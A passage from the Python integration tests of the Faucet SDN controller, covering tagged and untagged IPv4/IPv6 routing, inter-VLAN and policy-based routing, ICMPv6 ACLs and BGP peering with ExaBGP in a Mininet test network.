'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedICMPv6OrderedACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
- port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
200:
description: "not used"
300:
description: "not used"
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
"""
def test_tagged(self):
self._enable_event_log()
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_routed_ip = ipaddress.ip_interface('10.0.1.1/24')
second_host_routed_ip = ipaddress.ip_interface('10.0.2.1/24')
for _coldstart in range(2):
for _swaps in range(3):
self.verify_ipv4_routing(
first_host, first_host_routed_ip,
second_host, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
# change of a VLAN/ports not involved in routing, should be a warm start.
for vid in (300, 200):
self.change_port_config(
self.port_map['port_4'], 'native_vlan', vid,
restart=True, cold_start=False)
self.wait_until_matching_lines_from_file(
r'.+L3_LEARN.+10.0.0.[12].+', self.event_log)
class FaucetTaggedTargetedResolutionIPv4RouteTest(FaucetTaggedIPv4RouteTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
targeted_gw_resolution: True
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
"""
class FaucetTaggedProactiveNeighborIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('10.0.0.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '4', 'vlan': '100'}),
1)
class FaucetTaggedProactiveNeighborIPv6RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:3/64"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('fc00::1:99/64')
faucet_vip_ip = ipaddress.ip_interface('fc00::1:3/126')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, ipaddress.ip_interface('fc00::1:1/64'))
# We use a narrower mask to force second_host to use the /128 route,
# since otherwise it would realize :99 is directly connected via ND and send direct.
self.add_host_ipv6_address(second_host, ipaddress.ip_interface('fc00::1:2/126'))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, faucet_vip_ip.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '6', 'vlan': '100'}),
1)
class FaucetUntaggedIPv4GlobalInterVLANRouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
200:
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC2 + """
routers:
global:
vlans: [100, 200]
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
global_vlan: 300
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 200
"""
exabgp_peer_conf = """
static {
route 10.99.99.0/24 next-hop 10.200.0.1 local-preference 100;
route 10.0.5.0/24 next-hop 127.0.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'), vlan_vid=300)
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
class FaucetUntaggedIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
for vlanb_vid in (300, 200):
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.change_vlan_config(
'vlanb', 'vid', vlanb_vid, restart=True, cold_start=True)
class FaucetUntaggedPortSwapIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
vlana:
vid: 100
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [vlana, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: vlana
%(port_2)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_connectivity(host_a, host_b):
host_a.setIP(str(first_host_ip.ip), prefixLen=24)
host_b.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(host_a, second_host_ip, first_faucet_vip.ip)
self.add_host_route(host_b, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(host_a, second_host_ip.ip)
self.one_ipv4_ping(host_b, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(host_a, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(host_b, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
test_connectivity(first_host, second_host)
# Delete port 1, add port 3
self.change_port_config(
self.port_map['port_1'], None, None,
restart=False, cold_start=False)
self.add_port_config(
self.port_map['port_3'], {'native_vlan': 'vlana'},
restart=True, cold_start=True)
test_connectivity(third_host, second_host)
class FaucetUntaggedExpireIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
max_host_fib_retry_count: 2
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
second_host.cmd('ifconfig %s down' % second_host.defaultIntf().name)
expired_re = r'.+expiring dead route %s.+' % second_host_ip.ip
self.wait_until_matching_lines_from_faucet_log_files(expired_re)
second_host.cmd('ifconfig %s up' % second_host.defaultIntf().name)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
class FaucetUntaggedIPv6InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["fc00::1:254/112", "fe80::1:254/112"]
vlanb:
vid: 200
faucet_vips: ["fc01::1:254/112", "fe80::2:254/112"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.add_host_ipv6_address(second_host, second_host_net)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedIPv4PolicyRouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# want to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedIPv4PolicyRouteOrdereredTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
- swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
- swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3
# we want to route 10.99.0.0/24 to b2, but we want
# want to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedMixedIPv4RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["172.16.0.254/24", "10.0.0.254/24"]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('10.0.0.1/24')
second_host_net = ipaddress.ip_interface('172.16.0.1/24')
second_host.setIP(str(second_host_net.ip), prefixLen=24)
self.one_ipv4_ping(first_host, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, self.FAUCET_VIPV4_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV4.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV4_2.ip)
self.one_ipv4_ping(first_host, second_host_net.ip)
self.one_ipv4_ping(second_host, first_host_net.ip)
class FaucetUntaggedMixedIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112", "fc01::1:254/112"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.one_ipv6_ping(first_host, self.FAUCET_VIPV6.ip)
self.add_host_ipv6_address(second_host, second_host_net)
self.one_ipv6_ping(second_host, self.FAUCET_VIPV6_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedBGPIPv6DefaultRouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route ::/0 next-hop fc00::1:1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
first_host_alias_ip = ipaddress.ip_interface('fc00::50:1/112')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV6.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.one_ipv6_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv6RouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route fc00::10:0/112 next-hop fc00::1:1 local-preference 100;
route fc00::20:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::30:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::40:0/112 next-hop fc00::1:254;
route fc00::50:0/112 next-hop fc00::2:2;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.assertEqual(self.NUM_FAUCET_CONTROLLERS, 1)
first_host, second_host = self.hosts_name_ordered()[:2]
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+fc00::40:0\/112.+cannot be us$')
self.verify_ipv6_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv6_routing_mesh()
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedSameVlanIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::10:1/112", "fc00::20:1/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::10:2"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::20:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::10:2/112')
first_host_ctrl_ip = ipaddress.ip_address('fc00::10:1')
second_host_ip = ipaddress.ip_interface('fc00::20:2/112')
second_host_ctrl_ip = ipaddress.ip_address('fc00::20:1')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
self.add_host_route(
first_host, second_host_ip, first_host_ctrl_ip)
self.add_host_route(
second_host, first_host_ip, second_host_ctrl_ip)
self.wait_for_route_as_flow(
first_host.MAC(), first_host_ip.network)
self.wait_for_route_as_flow(
second_host.MAC(), second_host_ip.network)
self.one_ipv6_ping(first_host, second_host_ip.ip)
self.one_ipv6_ping(first_host, second_host_ctrl_ip)
self.one_ipv6_ping(second_host, first_host_ip.ip)
self.one_ipv6_ping(second_host, first_host_ctrl_ip)
class FaucetUntaggedIPv6RouteTest(FaucetUntaggedTest):
NUM_FAUCET_CONTROLLERS = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
- route:
ip_dst: "fc00::30:0/112"
ip_gw: "fc00::1:2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def post_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1')
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.verify_ipv6_routing_mesh()
second_host = self.hosts_name_ordered()[1]
self.flap_all_switch_ports()
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv6Network('fc00::30:0/112'))
self.verify_ipv6_routing_mesh()
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}, default=0),
0)
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'fc00::1:0/112 next-hop fc00::1:254',
'fc00::10:0/112 next-hop fc00::1:1',
'fc00::20:0/112 next-hop fc00::1:2',
'fc00::30:0/112 next-hop fc00::1:2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetTaggedIPv6RouteTest(FaucetTaggedTest):
"""Test basic IPv6 routing without BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
"""Test IPv6 routing works."""
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
first_host_routed_ip = ipaddress.ip_interface('fc00::10:1/112')
